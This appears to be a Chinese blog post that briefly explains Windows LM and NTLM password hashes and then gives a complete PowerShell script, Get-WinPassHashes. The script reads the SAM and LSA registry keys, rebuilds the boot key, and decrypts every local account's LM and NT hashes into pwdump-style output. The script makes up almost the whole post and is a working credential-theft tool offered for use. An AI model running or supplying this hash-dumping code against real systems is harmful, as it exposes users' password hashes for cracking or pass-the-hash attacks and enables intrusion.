早期SMB協議在網絡上傳輸明文口令。後來出現"LAN Manager Challenge/Response"驗證機制,簡稱LM,它是如此簡單以致很容易被破解。微軟提出了WindowsNT挑戰/響應驗證機制,稱之爲NTLM。如今已經有了更新的NTLMv2以及Kerberos驗證體系。Windows加密過的密碼口令,咱們稱之爲hash(中文:哈希),Windows的系統密碼hash默認狀況下通常由兩部分組成:第一部分是LM-hash,第二部分是NTLM-hash。shell
function Get-WinPassHashes { <# Author:fuhj(powershell#live.cn ,http://fuhaijun.com) # Get windows password hash and returns the hash list #.Example # Get-WinPassHashes # #> [CmdletBinding()] Param () function LoadApi { $oldErrorAction = $global:ErrorActionPreference; $global:ErrorActionPreference = "SilentlyContinue"; $test = [PowerDump.Native]; $global:ErrorActionPreference = $oldErrorAction; if ($test) { # already loaded return; } $code = @' using System; using System.Security.Cryptography; using System.Runtime.InteropServices; using System.Text; namespace PowerDump { public class Native { [DllImport("advapi32.dll", CharSet = CharSet.Auto)] public static extern int RegOpenKeyEx( int hKey, string subKey, int ulOptions, int samDesired, out int hkResult); [DllImport("advapi32.dll", EntryPoint = "RegEnumKeyEx")] extern public static int RegEnumKeyEx( int hkey, int index, StringBuilder lpName, ref int lpcbName, int reserved, StringBuilder lpClass, ref int lpcbClass, out long lpftLastWriteTime); [DllImport("advapi32.dll", EntryPoint="RegQueryInfoKey", CallingConvention=CallingConvention.Winapi, SetLastError=true)] extern public static int RegQueryInfoKey( int hkey, StringBuilder lpClass, ref int lpcbClass, int lpReserved, out int lpcSubKeys, out int lpcbMaxSubKeyLen, out int lpcbMaxClassLen, out int lpcValues, out int lpcbMaxValueNameLen, out int lpcbMaxValueLen, out int lpcbSecurityDescriptor, IntPtr lpftLastWriteTime); [DllImport("advapi32.dll", SetLastError=true)] public static extern int RegCloseKey( int hKey); } } // end namespace PowerDump public class Shift { public static int Right(int x, int count) { return x >> count; } public static uint Right(uint x, int count) { return x >> count; } public static long Right(long x, int count) { return x >> count; } public static ulong Right(ulong x, int count) { return x >> count; } public static int Left(int x, int count) { return x << count; } public static uint Left(uint x, int count) { return x << count; } public static long Left(long x, int count) { return x << count; } public static ulong Left(ulong x, int count) { return x << count; } } '@ $provider = New-Object Microsoft.CSharp.CSharpCodeProvider $dllName = [PsObject].Assembly.Location $compilerParameters = New-Object System.CodeDom.Compiler.CompilerParameters $assemblies = @("System.dll", $dllName) $compilerParameters.ReferencedAssemblies.AddRange($assemblies) $compilerParameters.GenerateInMemory = $true $compilerResults = $provider.CompileAssemblyFromSource($compilerParameters, $code) if($compilerResults.Errors.Count -gt 0) { $compilerResults.Errors | % { Write-Error ("{0}:`t{1}" -f $_.Line,$_.ErrorText) } } } $antpassword = [Text.Encoding]::ASCII.GetBytes("NTPASSWORD`0"); $almpassword = [Text.Encoding]::ASCII.GetBytes("LMPASSWORD`0"); $empty_lm = [byte[]]@(0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee,0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee); $empty_nt = [byte[]]@(0x31,0xd6,0xcf,0xe0,0xd1,0x6a,0xe9,0x31,0xb7,0x3c,0x59,0xd7,0xe0,0xc0,0x89,0xc0); $odd_parity = @( 1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14, 16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31, 32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47, 49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62, 64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79, 81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94, 97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110, 112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127, 128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143, 145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158, 161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174, 176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191, 193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206, 208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223, 224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239, 241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254 ); function sid_to_key($sid) { $s1 = @(); $s1 += [char]($sid -band 0xFF); $s1 += [char]([Shift]::Right($sid,8) -band 0xFF); $s1 += [char]([Shift]::Right($sid,16) -band 0xFF); $s1 += [char]([Shift]::Right($sid,24) -band 0xFF); $s1 += $s1[0]; $s1 += $s1[1]; $s1 += $s1[2]; $s2 = @(); $s2 += $s1[3]; $s2 += $s1[0]; $s2 += $s1[1]; $s2 += $s1[2]; $s2 += $s2[0]; $s2 += $s2[1]; $s2 += $s2[2]; return ,((str_to_key $s1),(str_to_key $s2)); } function str_to_key($s) { $key = @(); $key += [Shift]::Right([int]($s[0]), 1 ); $key += [Shift]::Left( $([int]($s[0]) -band 0x01), 6) -bor [Shift]::Right([int]($s[1]),2); $key += [Shift]::Left( $([int]($s[1]) -band 0x03), 5) -bor [Shift]::Right([int]($s[2]),3); $key += [Shift]::Left( $([int]($s[2]) -band 0x07), 4) -bor [Shift]::Right([int]($s[3]),4); $key += [Shift]::Left( $([int]($s[3]) -band 0x0F), 3) -bor [Shift]::Right([int]($s[4]),5); $key += [Shift]::Left( $([int]($s[4]) -band 0x1F), 2) -bor [Shift]::Right([int]($s[5]),6); $key += [Shift]::Left( $([int]($s[5]) -band 0x3F), 1) -bor [Shift]::Right([int]($s[6]),7); $key += $([int]($s[6]) -band 0x7F); 0..7 | %{ $key[$_] = [Shift]::Left($key[$_], 1); $key[$_] = $odd_parity[$key[$_]]; } return ,$key; } function NewRC4([byte[]]$key) { return new-object Object | Add-Member NoteProperty key $key -PassThru | Add-Member NoteProperty S $null -PassThru | Add-Member ScriptMethod init { if (-not $this.S) { [byte[]]$this.S = 0..255; 0..255 | % -begin{[long]$j=0;}{ $j = ($j + $this.key[$($_ % $this.key.Length)] + $this.S[$_]) % $this.S.Length; $temp = $this.S[$_]; $this.S[$_] = $this.S[$j]; $this.S[$j] = $temp; } } } -PassThru | Add-Member ScriptMethod "encrypt" { $data = $args[0]; $this.init(); $outbuf = new-object byte[] $($data.Length); $S2 = $this.S[0..$this.S.Length]; 0..$($data.Length-1) | % -begin{$i=0;$j=0;} { $i = ($i+1) % $S2.Length; $j = ($j + $S2[$i]) % $S2.Length; $temp = $S2[$i];$S2[$i] = $S2[$j];$S2[$j] = $temp; $a = $data[$_]; $b = $S2[ $($S2[$i]+$S2[$j]) % $S2.Length ]; $outbuf[$_] = ($a -bxor $b); } return ,$outbuf; } -PassThru } function des_encrypt([byte[]]$data, [byte[]]$key) { return ,(des_transform $data $key $true) } function des_decrypt([byte[]]$data, [byte[]]$key) { return ,(des_transform $data $key $false) } function des_transform([byte[]]$data, [byte[]]$key, $doEncrypt) { $des = new-object Security.Cryptography.DESCryptoServiceProvider; $des.Mode = [Security.Cryptography.CipherMode]::ECB; $des.Padding = [Security.Cryptography.PaddingMode]::None; $des.Key = $key; $des.IV = $key; $transform = $null; if ($doEncrypt) {$transform = $des.CreateEncryptor();} else{$transform = $des.CreateDecryptor();} $result = $transform.TransformFinalBlock($data, 0, $data.Length); return ,$result; } function Get-RegKeyClass([string]$key, [string]$subkey) { switch ($Key) { "HKCR" { $nKey = 0x80000000} #HK Classes Root "HKCU" { $nKey = 0x80000001} #HK Current User "HKLM" { $nKey = 0x80000002} #HK Local Machine "HKU" { $nKey = 0x80000003} #HK Users "HKCC" { $nKey = 0x80000005} #HK Current Config default { throw "Invalid Key. Use one of the following options HKCR, HKCU, HKLM, HKU, HKCC" } } $KEYQUERYVALUE = 0x1; $KEYREAD = 0x19; $KEYALLACCESS = 0x3F; $result = ""; [int]$hkey=0 if (-not [PowerDump.Native]::RegOpenKeyEx($nkey,$subkey,0,$KEYREAD,[ref]$hkey)) { $classVal = New-Object Text.Stringbuilder 1024 [int]$len = 1024 if (-not [PowerDump.Native]::RegQueryInfoKey($hkey,$classVal,[ref]$len,0,[ref]$null,[ref]$null, [ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,0)) { $result = $classVal.ToString() } else { Write-Error "RegQueryInfoKey failed"; } [PowerDump.Native]::RegCloseKey($hkey) | Out-Null } else { Write-Error "Cannot open key"; } return $result; } function Get-BootKey { $s = [string]::Join("",$("JD","Skew1","GBG","Data" | %{Get-RegKeyClass "HKLM" "SYSTEM\CurrentControlSet\Control\Lsa\$_"})); $b = new-object byte[] $($s.Length/2); 0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)} $b2 = new-object byte[] 16; 0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 | % -begin{$i=0;}{$b2[$i]=$b[$_];$i++} return ,$b2; } function Get-HBootKey { param([byte[]]$bootkey); $aqwerty = [Text.Encoding]::ASCII.GetBytes("!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%`0"); $anum = [Text.Encoding]::ASCII.GetBytes("0123456789012345678901234567890123456789`0"); $k = Get-Item HKLM:\SAM\SAM\Domains\Account; if (-not $k) {return $null} [byte[]]$F = $k.GetValue("F"); if (-not $F) {return $null} $rc4key = [Security.Cryptography.MD5]::Create().ComputeHash($F[0x70..0x7F] + $aqwerty + $bootkey + $anum); $rc4 = NewRC4 $rc4key; return ,($rc4.encrypt($F[0x80..0x9F])); } function Get-UserName([byte[]]$V) { if (-not $V) {return $null}; $offset = [BitConverter]::ToInt32($V[0x0c..0x0f],0) + 0xCC; $len = [BitConverter]::ToInt32($V[0x10..0x13],0); return [Text.Encoding]::Unicode.GetString($V, $offset, $len); } function Get-UserHashes($u, [byte[]]$hbootkey) { [byte[]]$enc_lm_hash = $null; [byte[]]$enc_nt_hash = $null; if ($u.HashOffset + 0x28 -lt $u.V.Length) { $lm_hash_offset = $u.HashOffset + 4; $nt_hash_offset = $u.HashOffset + 8 + 0x10; $enc_lm_hash = $u.V[$($lm_hash_offset)..$($lm_hash_offset+0x0f)]; $enc_nt_hash = $u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)]; } elseif ($u.HashOffset + 0x14 -lt $u.V.Length) { $nt_hash_offset = $u.HashOffset + 8; $enc_nt_hash = [byte[]]$u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)]; } return ,(DecryptHashes $u.Rid $enc_lm_hash $enc_nt_hash $hbootkey); } function DecryptHashes($rid, [byte[]]$enc_lm_hash, [byte[]]$enc_nt_hash, [byte[]]$hbootkey) { [byte[]]$lmhash = $empty_lm; [byte[]]$nthash=$empty_nt; # LM Hash if ($enc_lm_hash) { $lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword; } # NT Hash if ($enc_nt_hash) { $nthash = DecryptSingleHash $rid $hbootkey $enc_nt_hash $antpassword; } return ,($lmhash,$nthash) } function DecryptSingleHash($rid,[byte[]]$hbootkey,[byte[]]$enc_hash,[byte[]]$lmntstr) { $deskeys = sid_to_key $rid; $md5 = [Security.Cryptography.MD5]::Create(); $rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr); $rc4 = NewRC4 $rc4_key; $obfkey = $rc4.encrypt($enc_hash); $hash = (des_decrypt $obfkey[0..7] $deskeys[0]) + (des_decrypt $obfkey[8..$($obfkey.Length - 1)] $deskeys[1]); return ,$hash; } function Get-UserKeys { ls HKLM:\SAM\SAM\Domains\Account\Users | where {$_.PSChildName -match "^[0-9A-Fa-f]{8}$"} | Add-Member AliasProperty KeyName PSChildName -PassThru | Add-Member ScriptProperty Rid {[Convert]::ToInt32($this.PSChildName, 16)} -PassThru | Add-Member ScriptProperty V {[byte[]]($this.GetValue("V"))} -PassThru | Add-Member ScriptProperty UserName {Get-UserName($this.GetValue("V"))} -PassThru | Add-Member ScriptProperty HashOffset {[BitConverter]::ToUInt32($this.GetValue("V")[0x9c..0x9f],0) + 0xCC} -PassThru } function DumpHashes { LoadApi $bootkey = Get-BootKey; $hbootKey = Get-HBootKey $bootkey; Get-UserKeys | %{ $hashes = Get-UserHashes $_ $hBootKey; "{0}:{1}:{2}:{3}:::" -f ($_.UserName,$_.Rid, [BitConverter]::ToString($hashes[0]).Replace("-","").ToLower(), [BitConverter]::ToString($hashes[1]).Replace("-","").ToLower()); } } DumpHashes }
做者: 付海軍
我的網站: http://www.fuhaijun.com/